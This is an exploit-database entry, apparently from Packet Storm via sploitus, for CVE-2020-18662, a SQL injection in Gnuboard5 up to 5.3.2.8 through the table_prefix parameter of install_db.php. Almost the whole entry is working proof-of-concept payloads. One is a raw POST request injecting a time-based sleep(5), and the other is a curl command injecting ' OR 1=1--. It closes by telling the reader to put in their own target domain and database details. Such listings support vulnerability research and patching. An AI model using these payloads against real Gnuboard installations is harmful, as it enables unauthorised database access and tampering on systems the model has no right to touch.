Share
## https://sploitus.com/exploit?id=PACKETSTORM:190427
# Exploit Title: [Gnuboard5 <= 5.3.2.8 SQL Injection via table_prefix Parameter]
    # Date: [2024-10-26]
    # Exploit Author: [CodeSecLab]
    # Vendor Homepage: [https://github.com/gnuboard/gnuboard5]
    # Software Link: [https://github.com/gnuboard/gnuboard5]
    # Version: [5.3.2.8] 
    # Tested on: [Ubuntu Windows]
    # CVE : [CVE-2020-18662]
    
    PoC: 
    1)
    POST /install/install_db.php HTTP/1.1
    Host: gnuboard
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 100
    
    mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#
    result: sleep 5s.
    2)
    curl -X POST http://gnuboard/install/install_db.php \
      -d "mysql_user=root" \
      -d "mysql_pass=password" \
      -d "mysql_db=gnuboard_db" \
      -d "table_prefix=' OR 1=1--"
    result: The application does not work.
    
    [Replace Your Domain Name and Replace Database Information]